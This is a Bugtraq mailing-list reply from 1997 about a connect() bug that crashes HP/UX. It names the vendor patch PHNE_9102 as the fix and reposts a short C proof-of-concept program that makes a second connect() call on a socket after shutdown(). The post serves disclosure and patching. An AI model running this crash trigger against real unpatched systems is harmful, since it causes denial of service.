Bugtraq mailing list archives
Re: Bug in connect() ?
From: hofmann () WPAX01 PHYSIK UNI-WUERZBURG DE (Frank Hofmann)
Date: Mon, 10 Mar 1997 20:25:58 +0100
On Fri, 7 Mar 1997, Frank Hofmann wrote: [ ... ]
I'm gonna try some recent HP patches as I had one report that HP/UX 9.05 is vulnerable and one that it is not. Perhaps it's fixed and I'm missing the patch.
I indeed did miss the patch. For my 10.01 box, PHNE_9102 (ARPA transport cumulative patch) fixes the crash. I did not have this installed as I thought it to be mostly identical to the earlier PHNE_9032 (remember the ping attack?). Obviously it is not.

Someone tried the corresponding patches on other HP/UX versions?

Bye,
Frank Hofmann

Here's the code again, for those having missed the original posting:

-------------------------------------------------------------------------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>   /* atoi(), exit() */
#include <strings.h>  /* bcopy() */

int main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in server;
    struct hostent *hp;

    if (argc > 3)
        exit(-1);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    hp = gethostbyname("localhost");
    bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length);
    server.sin_family = AF_INET;

    /* first connect(): port from argv[1], default 23 */
    server.sin_port = (argc >= 2) ? atoi(argv[1]) : 23;
    connect(sock, (struct sockaddr *)&server, sizeof server);

    shutdown(sock, 2);

    /* second connect() on the same socket after shutdown(): port from argv[2], default 24 */
    server.sin_port = (argc == 3) ? atoi(argv[2]) : 24;
    connect(sock, (struct sockaddr *)&server, sizeof server);
    return 0;
}